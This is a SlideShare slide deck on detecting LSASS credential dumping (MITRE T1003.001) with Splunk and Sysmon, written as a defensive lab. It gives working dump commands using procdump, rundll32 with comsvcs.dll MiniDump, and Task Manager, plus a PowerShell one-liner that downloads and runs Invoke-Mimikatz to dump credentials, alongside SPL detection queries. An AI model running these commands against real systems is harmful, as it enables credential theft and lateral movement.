SlideShare ist ein Scribd-Unternehmen logo
1 von 18
Downloaden Sie, um offline zu lesen
MITRE ATT&CK Techniques -
OS Credential Dumping
https://redcanary.com/threat-detection-report/techniques/lsass-memory/
https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-
t1003-credential-dumping
 Goal: Able to detect the Credential dumping performed by attacker using
Splunk SIEM.
 Achievement: Able to Create Rules/SPL command and SIEM able to
detect the process perform by the attacker.
 Impact:Adversaries can use credentials gathered by this technique to:
 Access restricted information
 Access critical assets
 Perform lateral movement through the network by compromising other systems using the
same credentials
 Create new accounts, perform actions, and remove the new account to clear tracks
 Analyze password patterns and password policy to reveal other credentials
OS Credential Dumping
(Technique :Credential Dumping-T1003.001 LSASS Memory)
Introduction
Technique :Credential Dumping-T1003.001 LSASS Memory
 This Technique enables adversaries to obtain account login and
 password information from the operating system and software.
 The Local Security Authority Subsystem Service (LSASS) stores credentials
 of the logged in users in memory to provide seamless access to network resources
 without re-entering their credentials
How?
 Attacker required to interact with the lsass.exe process and dump its memory.
Methods
 Several Methods and Tools can be utilized to dump credentials in memory:
1. Windows Task Manager: Create Dump File feature of the Windows Task Manager can dump the memory of
the lsass.exe process since Windows Vista/Server 2008.
2. ProcDump: A command-line utility that is a part of the Microsoft Sysinternals suite – Mostly used by Attacker
3. Comsvcs.dll: Native Windows DLL located in the %systemroot%system32 directory. It has a MiniDump
function to dump lsass.exe process memory to retrieve credentials.
LSASS process memory
-The Local Security Authority Subsystem Service
(LSASS) stores credentials in memory on behalf of
users with active Windows sessions.
-This allows users to seamlessly access network
resources, such as file shares, Exchange Server
mailboxes, and SharePoint sites, without re-
entering their credentials for each remote service.
-Password stored in LSASS process memory can
used to conduct Lateral Movement
LSASS dump via
Procdump
LSASS dump via
Task Manager
LSASS dump via
Comsvcs.dll
Gained Access to
Victim’s machine
Attacker
Use Case
Attack Diagram
Attacker gained access to
victim’s machine and use
OS Credential Dumping
Technique to obtain
account login and
password
Client PC (Victim)
10.10.10.x
SPLUNK SIEM
Server
192.168.10.x
Pre-requisite
 VM test machine – OS Windows
 Splunk Server
 Splunk Forwarder
 Enable Sysmon
 Procdump
LSASS process memory
-The Local Security Authority Subsystem Service (LSASS)
stores credentials in memory on behalf of users with
active Windows sessions.
-This allows users to seamlessly access network
resources, such as file shares, Exchange Server
mailboxes, and SharePoint sites, without re-entering their
credentials for each remote service.
-Password stored in LSASS process memory can used to
conduct Lateral Movement
OS Credential Dumping
(Technique :Credential Dumping-T1003.001 LSASS Memory) – Attack Flow
LSASS Dump via Windows Task
Manager – 1st Method
 Dumping Memory of lsass.exe Process with Task Manager
 Open the task manager and click more details to open all
processes.
 Right-click on the Local Security Authority Process under
Windows Processes.
 Click on Create dump file.
One way it can be achieved is through Task Manager itself, by right
clicking on lsass.exe and selecting “Create dump file”. In this way we
don’t need to upload any suspicious executable on the target
machine, as Attacker can then download the DMP file and extract
the credentials offline.
Credentials were dumped manually via Task
Manager as they RDPed into each system. – RDP
vulnerability exploited.
Result from Splunk;
SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=11 TargetFilename="*lsass*.dmp" Image="C:Windows*taskmgr.exe" | table
TaskCategory, EventCode, Image, TargetFilename
Note;
-This is the query we use in Splunk to detect credential dumping using this method
-For this method, in Splunk we are looking for the detection of event Code 11, which is
refer to ‘File Create’ operation.
-The process and target file associated with ‘File Create’ operation is Task Manager &
file name created containing .dmp which is dump file.
LSASS Dump via Procdump – 2nd
Method
 Download Procdump. It’s a Windows Syinternal Tools. It allows to create dumps of the
processes
 Use command - procdump.exe -accepteula -ma lsass.exe lsass.dmp
File successfully dump.
***Note : Need to run as administrator
Procdump
-Is legitimate software thus it will not be considered as a malware when
we run.
-Primary purpose is monitoring an application for CPU spikes and
generating crash dumps during a spike that an administrator or
developer can use to determine the cause of the spike.
Possible vulnerability exploited;
SMB protocol – attacker can gain access to victim share and upload
Procdump to execute.
Result from Splunk;
SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 Image="*procdump*.exe"
CommandLine="*lsass*") OR (EventCode=10 TargetImage="C:WINDOWSsystem32lsass.exe" GrantedAccess="0x1FFFFF"
("procdump")) | dedup TaskCategory | table _time, RuleName, TaskCategory, SourceImage, TargetImage, CommandLine,
GrantedAccess
Note;
-For this method, in Splunk we are looking for the detection of event Code 1 ‘Process Create’
and Code10 (‘Process Access’).
-Process Create is to detect when procdump app is executed, and Process Access to detect
which process is procdump accessing to, in this case, LSASS process.
-Since we are using custom sysmon configuration, anything related to credential dumping using
LSASS will be detected under rule name, technique_name=Credential Dumping. Already
configured.
LSASS Dump via Comsvcs.dll – 3rd
Method
 We need process id of lsass.exe to dump its memory using Comsvcs.dll:
 Use Command Get-Process lsass
Comsvcsdll is built in Windows DLL, it has a MiniDump function
which can be used to dump lsass.exe process memory
Dynamic-link library
-library files contain code to
carry out a specific function for
an application in the Windows
operating systems
Cont…
 Use command .rundll32.exe
C:windowsSystem32comsvcs.dll, MiniDump 692
C:testlsass.dmp full
***Note : Need to run as administrator
-Windows DLL Host (rundll32.exe) is used to execute and
called MiniDumpW function in comsvcs.dll,
-Then it will create a MiniDump file.
****
MiniDumpW original function in comsvcs.dll actually used by
developers to debug when applications crash
Result from Splunk;
SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" comsvcs.dll |
table RuleName, EventCode, TaskCategory, Image, ImageLoaded, SourceImage, TargetImage,
CommandLine
Note;
-For this method, in Splunk we are looking for the detection related to comsvcs.dll.
-We are able to detect 3 important eventcode associated with comsvc.dll
-EventCode 1, 7 and 10.
1=Process Create, detect execution of Windows Rundll32.exe
7=ImageLoaed, which is Windows Rundll32 called comsvcs.dll (To execute MiniDump function)
10=Process Access, to detect process accessing to lsass.exe
Alert Triggered
How attacker extract password from dump
file?
 Using Mimikatz
 After creating a dump file of lsass.exe process, attacker
can use Mimikatz to extract passwords hashes
 Either attacker download mimikatz to victim's pc & execute
or attacker can upload the generated dump file to their pc
for offline crack hashes.
How?
 Command - IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMa
fia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invok
e-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
https://redcanary.com/threat-detection-
report/techniques/lsass-memory/
-comsvcs
https://www.ired.team/offensive-security/credential-
access-and-credential-dumping/dump-credentials-from-
lsass-process-without-mimikatz
-all
https://www.picussecurity.com/resource/blog/picus-10-
critical-mitre-attck-techniques-t1003-credential-dumping
-all
-including invoke-mimikatz

Weitere ähnliche Inhalte

Was ist angesagt?

Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Harry McLaren
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
50 Shades of Sigma
50 Shades of Sigma50 Shades of Sigma
50 Shades of SigmaFlorian Roth
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKMITRE ATT&CK
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!MITRE ATT&CK
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 

Was ist angesagt? (20)

Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
 
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies Security Operations, MITRE ATT&CK, SOC Roles / Competencies
Security Operations, MITRE ATT&CK, SOC Roles / Competencies
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
50 Shades of Sigma
50 Shades of Sigma50 Shades of Sigma
50 Shades of Sigma
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 

Ähnlich wie Mitre Attack - Credential Dumping - updated.pptx

Windows post exploitation
Windows post exploitationWindows post exploitation
Windows post exploitationyarden hanan
 
RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...
RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...
RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...Paula Januszkiewicz
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsAlessandro Pilotti
 
Module 8 System Hacking
Module 8   System HackingModule 8   System Hacking
Module 8 System Hackingleminhvuong
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Toolslove4upratik
 
Primer on password security
Primer on password securityPrimer on password security
Primer on password securitysecurityxploded
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Rightenigma0x3
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
 
PMM database open source monitoring solution
PMM database open source monitoring solutionPMM database open source monitoring solution
PMM database open source monitoring solutionLior Altarescu
 
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
CHAPTER 26  WINDOWS SECURITY  26.1  FUNDAMENTAL CHAPTER 26  WINDOWS SECURITY  26.1  FUNDAMENTAL
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL EstelaJeffery653
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniquesSymantec Security Response
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 
Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windowsdkaya
 
Securing Your Enterprise Web Apps with MongoDB Enterprise
Securing Your Enterprise Web Apps with MongoDB Enterprise Securing Your Enterprise Web Apps with MongoDB Enterprise
Securing Your Enterprise Web Apps with MongoDB Enterprise MongoDB
 
_Hackercool - September 2021.pdf
_Hackercool - September 2021.pdf_Hackercool - September 2021.pdf
_Hackercool - September 2021.pdfssuser5e1b13
 
Reversing & malware analysis training part 12 rootkit analysis
Reversing & malware analysis training part 12   rootkit analysisReversing & malware analysis training part 12   rootkit analysis
Reversing & malware analysis training part 12 rootkit analysisAbdulrahman Bassam
 

Ähnlich wie Mitre Attack - Credential Dumping - updated.pptx (20)

Mimikatz
MimikatzMimikatz
Mimikatz
 
Windows post exploitation
Windows post exploitationWindows post exploitation
Windows post exploitation
 
RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...
RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...
RSA 2018: Adventures in the Underland: Techniques against Hackers Evading the...
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on Windows
 
Module 8 System Hacking
Module 8   System HackingModule 8   System Hacking
Module 8 System Hacking
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Tools
 
Primer on password security
Primer on password securityPrimer on password security
Primer on password security
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
 
Basic malware analysis
Basic malware analysis Basic malware analysis
Basic malware analysis
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
PMM database open source monitoring solution
PMM database open source monitoring solutionPMM database open source monitoring solution
PMM database open source monitoring solution
 
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
CHAPTER 26  WINDOWS SECURITY  26.1  FUNDAMENTAL CHAPTER 26  WINDOWS SECURITY  26.1  FUNDAMENTAL
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
 
Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windows
 
PowerShell Remoting
PowerShell RemotingPowerShell Remoting
PowerShell Remoting
 
Securing Your Enterprise Web Apps with MongoDB Enterprise
Securing Your Enterprise Web Apps with MongoDB Enterprise Securing Your Enterprise Web Apps with MongoDB Enterprise
Securing Your Enterprise Web Apps with MongoDB Enterprise
 
_Hackercool - September 2021.pdf
_Hackercool - September 2021.pdf_Hackercool - September 2021.pdf
_Hackercool - September 2021.pdf
 
Reversing & malware analysis training part 12 rootkit analysis
Reversing & malware analysis training part 12   rootkit analysisReversing & malware analysis training part 12   rootkit analysis
Reversing & malware analysis training part 12 rootkit analysis
 

Kürzlich hochgeladen

WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024
WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024
WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024Jan Löffler
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...APNIC
 
Presentation2.pptx - JoyPress Wordpress
Presentation2.pptx -  JoyPress WordpressPresentation2.pptx -  JoyPress Wordpress
Presentation2.pptx - JoyPress Wordpressssuser166378
 
Computer 10 Lesson 8: Building a Website
Computer 10 Lesson 8: Building a WebsiteComputer 10 Lesson 8: Building a Website
Computer 10 Lesson 8: Building a WebsiteMavein
 
Zero-day Vulnerabilities
Zero-day VulnerabilitiesZero-day Vulnerabilities
Zero-day Vulnerabilitiesalihassaah1994
 
Vision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced Horizons
Vision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced HorizonsVision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced Horizons
Vision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced HorizonsRoxana Stingu
 
Check out the Free Landing Page Hosting in 2024
Check out the Free Landing Page Hosting in 2024Check out the Free Landing Page Hosting in 2024
Check out the Free Landing Page Hosting in 2024Shubham Pant
 
Introduction to ICANN and Fellowship program by Shreedeep Rayamajhi.pdf
Introduction to ICANN and Fellowship program  by Shreedeep Rayamajhi.pdfIntroduction to ICANN and Fellowship program  by Shreedeep Rayamajhi.pdf
Introduction to ICANN and Fellowship program by Shreedeep Rayamajhi.pdfShreedeep Rayamajhi
 
LESSON 10/ GROUP 10/ ST. THOMAS AQUINASS
LESSON 10/ GROUP 10/ ST. THOMAS AQUINASSLESSON 10/ GROUP 10/ ST. THOMAS AQUINASS
LESSON 10/ GROUP 10/ ST. THOMAS AQUINASSlesteraporado16
 
Bio Medical Waste Management Guideliness 2023 ppt.pptx
Bio Medical Waste Management Guideliness 2023 ppt.pptxBio Medical Waste Management Guideliness 2023 ppt.pptx
Bio Medical Waste Management Guideliness 2023 ppt.pptxnaveenithkrishnan
 
LESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdf
LESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdfLESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdf
LESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdfmchristianalwyn
 
TYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDS
TYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDSTYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDS
TYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDSedrianrheine
 

Kürzlich hochgeladen (12)

WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024
WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024
WordPress by the numbers - Jan Loeffler, CTO WebPros, CloudFest 2024
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
Presentation2.pptx - JoyPress Wordpress
Presentation2.pptx -  JoyPress WordpressPresentation2.pptx -  JoyPress Wordpress
Presentation2.pptx - JoyPress Wordpress
 
Computer 10 Lesson 8: Building a Website
Computer 10 Lesson 8: Building a WebsiteComputer 10 Lesson 8: Building a Website
Computer 10 Lesson 8: Building a Website
 
Zero-day Vulnerabilities
Zero-day VulnerabilitiesZero-day Vulnerabilities
Zero-day Vulnerabilities
 
Vision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced Horizons
Vision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced HorizonsVision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced Horizons
Vision Forward: Tracing Image Search SEO From Its Roots To AI-Enhanced Horizons
 
Check out the Free Landing Page Hosting in 2024
Check out the Free Landing Page Hosting in 2024Check out the Free Landing Page Hosting in 2024
Check out the Free Landing Page Hosting in 2024
 
Introduction to ICANN and Fellowship program by Shreedeep Rayamajhi.pdf
Introduction to ICANN and Fellowship program  by Shreedeep Rayamajhi.pdfIntroduction to ICANN and Fellowship program  by Shreedeep Rayamajhi.pdf
Introduction to ICANN and Fellowship program by Shreedeep Rayamajhi.pdf
 
LESSON 10/ GROUP 10/ ST. THOMAS AQUINASS
LESSON 10/ GROUP 10/ ST. THOMAS AQUINASSLESSON 10/ GROUP 10/ ST. THOMAS AQUINASS
LESSON 10/ GROUP 10/ ST. THOMAS AQUINASS
 
Bio Medical Waste Management Guideliness 2023 ppt.pptx
Bio Medical Waste Management Guideliness 2023 ppt.pptxBio Medical Waste Management Guideliness 2023 ppt.pptx
Bio Medical Waste Management Guideliness 2023 ppt.pptx
 
LESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdf
LESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdfLESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdf
LESSON 5 GROUP 10 ST. THOMAS AQUINAS.pdf
 
TYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDS
TYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDSTYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDS
TYPES AND DEFINITION OF ONLINE CRIMES AND HAZARDS
 

Mitre Attack - Credential Dumping - updated.pptx

  • 1. MITRE ATT&CK Techniques - OS Credential Dumping https://redcanary.com/threat-detection-report/techniques/lsass-memory/ https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques- t1003-credential-dumping
  • 2.  Goal: Able to detect the Credential dumping performed by attacker using Splunk SIEM.  Achievement: Able to Create Rules/SPL command and SIEM able to detect the process perform by the attacker.  Impact:Adversaries can use credentials gathered by this technique to:  Access restricted information  Access critical assets  Perform lateral movement through the network by compromising other systems using the same credentials  Create new accounts, perform actions, and remove the new account to clear tracks  Analyze password patterns and password policy to reveal other credentials OS Credential Dumping (Technique :Credential Dumping-T1003.001 LSASS Memory)
  • 3. Introduction Technique :Credential Dumping-T1003.001 LSASS Memory  This Technique enables adversaries to obtain account login and  password information from the operating system and software.  The Local Security Authority Subsystem Service (LSASS) stores credentials  of the logged in users in memory to provide seamless access to network resources  without re-entering their credentials How?  Attacker required to interact with the lsass.exe process and dump its memory. Methods  Several Methods and Tools can be utilized to dump credentials in memory: 1. Windows Task Manager: Create Dump File feature of the Windows Task Manager can dump the memory of the lsass.exe process since Windows Vista/Server 2008. 2. ProcDump: A command-line utility that is a part of the Microsoft Sysinternals suite – Mostly used by Attacker 3. Comsvcs.dll: Native Windows DLL located in the %systemroot%system32 directory. It has a MiniDump function to dump lsass.exe process memory to retrieve credentials. LSASS process memory -The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. -This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re- entering their credentials for each remote service. -Password stored in LSASS process memory can used to conduct Lateral Movement
  • 4. LSASS dump via Procdump LSASS dump via Task Manager LSASS dump via Comsvcs.dll Gained Access to Victim’s machine Attacker Use Case
  • 5. Attack Diagram Attacker gained access to victim’s machine and use OS Credential Dumping Technique to obtain account login and password Client PC (Victim) 10.10.10.x SPLUNK SIEM Server 192.168.10.x
  • 6. Pre-requisite  VM test machine – OS Windows  Splunk Server  Splunk Forwarder  Enable Sysmon  Procdump LSASS process memory -The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. -This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service. -Password stored in LSASS process memory can used to conduct Lateral Movement
  • 7. OS Credential Dumping (Technique :Credential Dumping-T1003.001 LSASS Memory) – Attack Flow
  • 8. LSASS Dump via Windows Task Manager – 1st Method  Dumping Memory of lsass.exe Process with Task Manager  Open the task manager and click more details to open all processes.  Right-click on the Local Security Authority Process under Windows Processes.  Click on Create dump file. One way it can be achieved is through Task Manager itself, by right clicking on lsass.exe and selecting “Create dump file”. In this way we don’t need to upload any suspicious executable on the target machine, as Attacker can then download the DMP file and extract the credentials offline. Credentials were dumped manually via Task Manager as they RDPed into each system. – RDP vulnerability exploited.
  • 9. Result from Splunk; SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*lsass*.dmp" Image="C:Windows*taskmgr.exe" | table TaskCategory, EventCode, Image, TargetFilename Note; -This is the query we use in Splunk to detect credential dumping using this method -For this method, in Splunk we are looking for the detection of event Code 11, which is refer to ‘File Create’ operation. -The process and target file associated with ‘File Create’ operation is Task Manager & file name created containing .dmp which is dump file.
  • 10. LSASS Dump via Procdump – 2nd Method  Download Procdump. It’s a Windows Syinternal Tools. It allows to create dumps of the processes  Use command - procdump.exe -accepteula -ma lsass.exe lsass.dmp File successfully dump. ***Note : Need to run as administrator Procdump -Is legitimate software thus it will not be considered as a malware when we run. -Primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. Possible vulnerability exploited; SMB protocol – attacker can gain access to victim share and upload Procdump to execute.
  • 11. Result from Splunk; SPL Command : index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 Image="*procdump*.exe" CommandLine="*lsass*") OR (EventCode=10 TargetImage="C:WINDOWSsystem32lsass.exe" GrantedAccess="0x1FFFFF" ("procdump")) | dedup TaskCategory | table _time, RuleName, TaskCategory, SourceImage, TargetImage, CommandLine, GrantedAccess Note; -For this method, in Splunk we are looking for the detection of event Code 1 ‘Process Create’ and Code10 (‘Process Access’). -Process Create is to detect when procdump app is executed, and Process Access to detect which process is procdump accessing to, in this case, LSASS process. -Since we are using custom sysmon configuration, anything related to credential dumping using LSASS will be detected under rule name, technique_name=Credential Dumping. Already configured.
  • 12. LSASS Dump via Comsvcs.dll – 3rd Method  We need process id of lsass.exe to dump its memory using Comsvcs.dll:  Use Command Get-Process lsass Comsvcsdll is built in Windows DLL, it has a MiniDump function which can be used to dump lsass.exe process memory Dynamic-link library -library files contain code to carry out a specific function for an application in the Windows operating systems
  • 13. Cont…  Use command .rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump 692 C:testlsass.dmp full ***Note : Need to run as administrator -Windows DLL Host (rundll32.exe) is used to execute and called MiniDumpW function in comsvcs.dll, -Then it will create a MiniDump file. **** MiniDumpW original function in comsvcs.dll actually used by developers to debug when applications crash
